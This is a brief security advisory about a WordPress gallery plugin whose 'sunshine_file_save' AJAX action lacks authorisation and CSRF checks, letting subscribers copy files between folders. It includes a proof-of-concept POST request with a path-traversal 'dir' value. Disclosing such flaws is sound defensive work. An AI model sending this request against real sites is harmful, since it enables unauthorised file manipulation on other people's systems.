The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, which could allow any authenticated users, such as subscriber to copy the gallery files to another folder.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=sunshine_file_save&gallery_id=1&dir=..%2Ftest&item_number=100

This function copies the jpg files from /uploads/test to /uploads/sunshine/1 folder.